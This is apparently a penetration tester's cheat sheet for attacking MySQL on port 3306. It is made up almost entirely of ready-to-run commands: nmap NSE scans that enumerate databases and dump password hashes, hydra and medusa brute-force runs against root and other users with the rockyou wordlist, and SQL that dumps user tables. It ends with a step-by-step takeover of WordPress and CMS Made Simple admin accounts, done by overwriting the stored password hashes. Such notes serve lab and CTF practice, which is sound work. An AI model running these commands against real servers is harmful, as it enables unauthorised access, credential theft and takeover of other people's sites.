MySql 3306

Basic commmands, find more on specific SQL injection/enum/privesc in dedicated section

#NMAP one-liner

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.10

#hydra

If the NSE scripts / other enum finds database users, bruteforce password with hydra

sudo hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.101.178 mysql

#Bruteforcing with medusa

medusa -h 10.10.10.10 -u bob -P rockyou.txt -t -M mysql

#Internal database enum (more in SQL enum section)

show databases; use textpattern; show tables; select * from users; select username,email,password from users; https://recipeforroot.com/mysql-to-system-root/ # good all-round guide

#Resetting user admin password

This assumes you have access to the database and can visualize the admin password hash In this example we overwrite the admin password of a wordpress client

1)Kali, encrypt whatever password you want in md5

echo -n "redcliff" | md5sum  

2)Run from within MariaDB shell

update wp_users set user_pass = '8d70e0d1acb06b4648c7aa8927509660' where ID = 1;

3)Login from login panel → /wp-login.php

Variant: (CMS Made Simple 2.2.13)

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'redcliff'))) where username = 'admin';

#connecting remotely

mysql -u root -h 192.168.101.184 -p

-p flag will prompt to input password